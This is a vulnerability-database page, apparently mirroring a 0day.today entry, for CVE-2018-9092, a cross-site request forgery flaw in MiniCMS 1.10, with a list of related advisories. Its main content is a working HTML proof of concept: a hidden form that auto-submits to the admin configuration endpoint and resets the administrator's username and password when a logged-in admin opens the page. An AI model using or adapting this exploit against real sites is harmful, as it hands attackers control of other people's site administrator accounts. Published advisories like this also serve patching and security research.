Lucene search
K

MiniCMS 1.10 - Cross-Site Request Forgery Vulnerability

🗓️ 30 Mar 2018 00:00:00Reported by zixianType 
zdt
 zdt
🔗 0day.today👁 39 Views

MiniCMS 1.10 CSRF Vulnerability, Change administrator account password via CSRF

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2018-9092
27 Mar 201822:29
attackerkb
CNVD
MiniCMS Cross-Site Request Forgery Vulnerability
28 Mar 201800:00
cnvd
CVE
CVE-2018-9092
27 Mar 201822:00
cve
Cvelist
CVE-2018-9092
27 Mar 201822:00
cvelist
Exploit DB
MiniCMS 1.10 - Cross-Site Request Forgery
30 Mar 201800:00
exploitdb
EUVD
EUVD-2018-20695
7 Oct 202500:30
euvd
exploitpack
MiniCMS 1.10 - Cross-Site Request Forgery
30 Mar 201800:00
exploitpack
NVD
CVE-2018-9092
27 Mar 201822:29
nvd
Packet Storm
MiniCMS 1.10 Cross Site Request Forgery
31 Mar 201800:00
packetstorm
Prion
Cross site request forgery (csrf)
27 Mar 201822:29
prion
Rows per page
<--
# Exploit Title:  MiniCMS 1.10 CSRF Vulnerability
# Date: 2018-03-28
# Exploit Author: zixian([email protected]、[email protected])
# Vendor Homepage: https://github.com/bg5sbk/MiniCMS
# Software Link: https://github.com/bg5sbk/MiniCMS
# Version: 1.10
# CVE : CVE-2018-9092
 
 
 
There is a CSRF vulnerability that can change the administrator account password
After the administrator logged in, open the following page
 poc:
-->
 
 <html>
 <head><meta http-equiv="Content-Type" content="text/html; charset=GB2312">
 <title>test</title>
 <body>
 <form action="http://127.0.0.1/minicms/mc-admin/conf.php" method="post">
 <input type="hidden" name="site_name" value="hack123" />  
 <input type="hidden" name="site_desc" value="hacktest" />  
 <input type="hidden" name="site_link" value="http://127.0.0.1/minicms" />  
 <input type="hidden" name="user_nick" value="hack" />  
 <input type="hidden" name="user_name" value="admin" />  
 <input type="hidden" name="user_pass" value="hackpass" />  
 <input type="hidden" name="comment_code" value="" />  
 <input type="hidden" name="save" value=" " /> 
 </form>
 <script>
  document.forms[0].submit();
 </script>
 </body>
 </head>
 </html>

#  0day.today [2018-04-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation